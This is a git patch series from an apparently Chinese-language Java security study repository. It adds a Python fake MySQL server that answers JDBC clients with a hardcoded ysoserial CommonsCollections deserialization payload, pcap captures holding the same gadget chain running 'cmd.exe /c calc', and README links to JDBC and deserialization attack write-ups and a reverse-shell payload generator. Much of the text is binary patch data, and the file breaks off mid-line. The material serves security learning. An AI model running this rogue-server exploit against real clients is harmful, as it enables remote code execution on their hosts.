z3)SCC12>KR?4$1vs=lbh#u)gJ208-k3|9>R)H^VW&>*8~4V2yQiK@hRa1|Dz&&p7+7rbTh|1$+!#7N|Sg*&5S z;?anm;Dh{=F4S!j{kjhZi zs-Fm5X*ry7CH|>Q``oddahJW*Tx7IA_P5KYAAIQTTQ$fpLZ?*}RgB?qwhxc*3?*1^ z&9?Whi#RpU1alUeK3$|XX2nz!j7yF2jp3peJcfJn?NiSW24A$3C~9~p;Sn4=h(a+~ zBou+YwE0gzKL6I&(#S*9=|)zC6tG7yDjJ4tuobfCrg82cFW!1);-`m|x@E4()`WP-J)|XCIBCy6~!V%q8 zzVq@^JJ+B6%M*$ITneVj)ieugxYs+oF24S&&G-F2584#ob?_=OrS|&_^hi8if|_TW d4gdB-Q5@=cO@~2xZ#44z_U*$O-vI(6rQ$Ne?kH=O(c@&dND|#w6+4}1VQ3YK#;|F+)TGqySSZ!ooS(5AQUgI52D2&LJtt~fqhwP{?ne zzxx7#6Fy&)AM`e)UYGQPd84G)QG8!lZ#C4uF*?zT>}T%~0*$qw4Ky~6)Og}(7_NrB z6h!BI$g#>id}oUv8fdg3d;29qf8~BxUJUqb+eQ~WfvT^?m_VW3i>>>?UpW71cXLra zKXxjZ-f0tr3zRMJSyQ7}7*-PaJ;YCgDK9E&{#peJ*o^dN{KF*rQF1MTn;o1ols5!*Cs|=4y{8|%sM@8 zVcjG$(wbqG%!<*9{Xpe69|n)^-e$e3t*yxJy@JZGnr`Kn9|zG@sSM_g(g_$WZZ*)5 zmH)VeP)G&^)a&DS6?H^aZ;ank)TyDVJ1XS&W4%FspX+MB4z+(>m-+22PrCW_t{zAK z0?4t-`~v&MZw)ls(B77U(6)>X^mHmtd%Jb758czU58ZCVln!N*K&}IpGi=#yP<>gX$K^ z!pSJllp$3)%GV|1^$eE%7R1sx5v2nJG4=2|e0N(ifjTi|Uu~R4c+M2OHmKyNjo`$R z_nv;R%6vXQJAUW0R}vH1+y&W z_`SJ<7q}o\#P,Q6j.mysql_native_password.......:.....!.......................root...&....av....S.M +.f..test.mysql_native_password..._runtime_version 1.8.0_341._client_version.5.1.47._client_name.MySQL Connector Java._client_license.GPL._runtime_vendor.Oracle Corporation.............................SHOW SESSION STATUS..........def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +detailMessaget..Ljava/lang/String;[. +stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. +lineNumberL..declaringClassq.~..L..fileNameq.~..L. +methodNameq.~..xp...Dt./me.l0tus.ysoserial.payloads.CommonsCollections5t..CommonsCollections5.javat. getObjectsq.~.....0q.~. +q.~..q.~..sq.~......t..ysoserial.gui.YsoForm$1t..YsoForm.javat..actionPerformedsq.~......t..javax.swing.AbstractButtont..AbstractButton.javat..fireActionPerformedsq.~.... ,t."javax.swing.AbstractButton$Handlerq.~..q.~..sq.~......t..javax.swing.DefaultButtonModelt..DefaultButtonModel.javaq.~..sq.~......q.~..q.~..t. +setPressedsq.~......t.*javax.swing.plaf.basic.BasicButtonListenert..BasicButtonListener.javat. +mouseReleasedsq.~......t..java.awt.Componentt..Component.javat..processMouseEventsq.~......t..javax.swing.JComponentt..JComponent.javaq.~.'sq.~......q.~.%q.~.&t..processEventsq.~......t..java.awt.Containert..Container.javaq.~.,sq.~......q.~.%q.~.&t..dispatchEventImplsq.~......q.~..q.~./q.~.1sq.~.....gq.~.%q.~.&t. +dispatchEventsq.~.....(t..java.awt.LightweightDispatcherq.~./t..retargetMouseEventsq.~......q.~.6q.~./q.~.'sq.~.....|q.~.6q.~./q.~.4sq.~......q.~..q.~./q.~.1sq.~.... +.t..java.awt.Windowt..Window.javaq.~.1sq.~.....gq.~.%q.~.&q.~.4sq.~......t..java.awt.EventQueuet..EventQueue.javaq.~.1sq.~.....aq.~.@q.~.At. +access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.Fsq.~......t..java.security.AccessControllert..AccessController.javat..doPrivilegedsq.~.....Jt.5java.security.ProtectionDomain$JavaSecurityAccessImplt..ProtectionDomain.javat..doIntersectionPrivilegesq.~.....Tq.~.Mq.~.Nq.~.Osq.~......t..java.awt.EventQueue$4q.~.Aq.~.Fsq.~......q.~.Rq.~.Aq.~.Fsq.~......q.~.Iq.~.Jq.~.Ksq.~.....Jq.~.Mq.~.Nq.~.Osq.~......q.~.@q.~.Aq.~.4sq.~......t..java.awt.EventDispatchThreadt..EventDispatchThread.javat..pumpOneEventForFilterssq.~.....tq.~.Xq.~.Yt..pumpEventsForFiltersq.~.....iq.~.Xq.~.Yt..pumpEventsForHierarchysq.~.....eq.~.Xq.~.Yt. +pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. +iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. +getRuntimeur..[Ljava.lang.Class;......Z....xp....t. getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. +loadFactorI. thresholdxp?@......w.........xx......."......../* mysql-connector-java-5.1.47 ( Revision: fe1903b1ecb4a96a917f7ed3190d80c049b1de29 ) */SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout \ No newline at end of file diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap new file mode 100644 index 0000000000000000000000000000000000000000..d04bd062c8b9f0c925942d776b3965ed8bb32e9a GIT binary patch literal 5188 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 C$vw6J literal 0 HcmV?d00001 diff --git a/JDBC/mysql/no-outbound/pom.xml b/JDBC/mysql/no-outbound/pom.xml new file mode 100644 index 0000000..03de165 --- /dev/null +++ b/JDBC/mysql/no-outbound/pom.xml @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + no-outbound + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java new file mode 100644 index 0000000..3d5261f --- /dev/null +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -0,0 +1,4 @@ +package exp; + +public class Exp { +} diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/hex.txt b/PyCharm/JDBC/Mysql/hex.txt new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md index afc5a5a..1867955 100644 --- a/README.md +++ b/README.md @@ -7,19 +7,9 @@ - [Java安全基础](#Java安全基础) - [代码和jar包调试](#代码和jar包调试) - [反序列化](#反序列化) - - CC链 - - hessian - - 其他链子&姿势 - [JNDI](#JNDI) - - 基础内容 - - 高版本JDK绕过 - - 基于BeanFactory - - 其他Factory绕过(主要结合JDBC打) - [JDBC](#JDBC) - [shiro](#shiro) - - - shiro反序列化 - - shiro越权 - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) @@ -27,17 +17,7 @@ - [SpringBoot](#SpringBoot) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - - - 若依 - - - WebGoat - - 泛微Ecology9 - - 用友U8Cloud - [代码审计辅助工具](#代码审计辅助工具) - - - jar-analyzer - - tabby - - CodeQL - [学习路线整合](#学习路线整合) - [工具推荐](#工具推荐) @@ -119,6 +99,22 @@
+# 查漏补缺 + +主要记录一些新遇到的小知识。 + +[Java Runtime.getRuntime().exec由表及里-先知社区](https://xz.aliyun.com/news/6642) 剖析了Runtime为什么不能识别特殊符号的本质 + +[shadow-horse/java.lang.Runtime.exec-Payload: 反弹shell,Runtime.exec()执行系统命令](https://github.com/shadow-horse/java.lang.Runtime.exec-Payload) Runtime命令生成 + + + + + +
+ + + # 反序列化 ## CC链 @@ -215,6 +211,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [MySQL jdbc 反序列化分析 | Drunkbaby's Blog](https://drun1baby.top/2023/01/13/MySQL-jdbc-反序列化分析/) 最经典的mysql-jdbc +[mysql JDBC 攻击 | 1diot9's Blog](https://1diot9.github.io/2025/05/05/mysql-JDBC-绕过/) 整理了打法和绕过 + ============如果真的很急,JDBC可以先只看上面这一个mysql,其他的遇到了再学================= [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) 这个打法比较新,其中的临时文件上传适用性广 From 82a1e9a37aa78f000b078efac5411b0ab5523306 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Sun, 12 Oct 2025 14:22:38 +0800 Subject: [PATCH 05/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0JDBC=20PY?= =?UTF-8?q?=E8=84=9A=E6=9C=AC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- PyCharm/.idea/.gitignore | 8 ++ PyCharm/.idea/PyCharm.iml | 8 ++ .../inspectionProfiles/Project_Default.xml | 39 +++++++ .../inspectionProfiles/profiles_settings.xml | 6 ++ PyCharm/.idea/misc.xml | 7 ++ PyCharm/.idea/modules.xml | 8 ++ PyCharm/.idea/vcs.xml | 6 ++ PyCharm/JDBC/Mysql/convert.py | 3 + PyCharm/JDBC/Mysql/fakeServer.py | 100 ++++++++++++++++++ PyCharm/JDBC/Mysql/fakeServerM4x.py | 90 ++++++++++++++++ PyCharm/JDBC/Mysql/hex.pcap | Bin 0 -> 5188 bytes PyCharm/JDBC/Mysql/hex.txt | 6 ++ PyCharm/JDBC/Mysql/hex1.pcap | Bin 0 -> 4060 bytes 13 files changed, 281 insertions(+) create mode 100644 PyCharm/.idea/.gitignore create mode 100644 PyCharm/.idea/PyCharm.iml create mode 100644 PyCharm/.idea/inspectionProfiles/Project_Default.xml create mode 100644 PyCharm/.idea/inspectionProfiles/profiles_settings.xml create mode 100644 PyCharm/.idea/misc.xml create mode 100644 PyCharm/.idea/modules.xml create mode 100644 PyCharm/.idea/vcs.xml create mode 100644 PyCharm/JDBC/Mysql/hex.pcap create mode 100644 PyCharm/JDBC/Mysql/hex1.pcap diff --git a/PyCharm/.idea/.gitignore b/PyCharm/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/PyCharm/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/PyCharm/.idea/PyCharm.iml b/PyCharm/.idea/PyCharm.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/PyCharm/.idea/PyCharm.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/Project_Default.xml b/PyCharm/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..528e736 --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,39 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/profiles_settings.xml b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml new file mode 100644 index 0000000..105ce2d --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/misc.xml b/PyCharm/.idea/misc.xml new file mode 100644 index 0000000..db8786c --- /dev/null +++ b/PyCharm/.idea/misc.xml @@ -0,0 +1,7 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/modules.xml b/PyCharm/.idea/modules.xml new file mode 100644 index 0000000..c04746d --- /dev/null +++ b/PyCharm/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/vcs.xml b/PyCharm/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/PyCharm/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py index e69de29..477f153 100644 --- a/PyCharm/JDBC/Mysql/convert.py +++ b/PyCharm/JDBC/Mysql/convert.py @@ -0,0 +1,3 @@ +with open("hex.txt", "r") as f: + data = bytes.fromhex(f.read()) + open("hex.pcap", "wb").write(data) \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py index e69de29..7349af8 100644 --- a/PyCharm/JDBC/Mysql/fakeServer.py +++ b/PyCharm/JDBC/Mysql/fakeServer.py @@ -0,0 +1,100 @@ +# coding=utf-8 +import socket +import binascii +import os + +greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400" +response_ok_data="0700000200000002000000" + +def receive_data(conn): + data = conn.recv(1024) + print("[*] Receiveing the package : {}".format(data)) + return str(data).lower() + +def send_data(conn,data): + print("[*] Sending the package : {}".format(data)) + conn.send(binascii.a2b_hex(data)) + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\cc5.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878' + return payload_content + +# 主要逻辑 +def run(): + + while 1: + conn, addr = sk.accept() + print("Connection come from {}:{}".format(addr[0],addr[1])) + + # 1.先发送第一个 问候报文 + send_data(conn,greeting_data) + + while True: + # 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok + receive_data(conn) + send_data(conn,response_ok_data) + + #其他过程 + data=receive_data(conn) + #查询一些配置信息,其中会发送自己的 版本号 + if "session.auto_increment_increment" in data: + _payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000' + send_data(conn,_payload) + data=receive_data(conn) + elif "show warnings" in data: + _payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000' + send_data(conn, _payload) + data = receive_data(conn) + if "set names" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "set character_set_results" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "show session status" in data: + mysql_data = '0100000102' + mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000' + mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000' + # 为什么我加了EOF Packet 就无法正常运行呢?? + # 获取payload + payload_content=get_payload_content() + # 计算payload长度 + payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + # 计算数据包长度 + data_len = 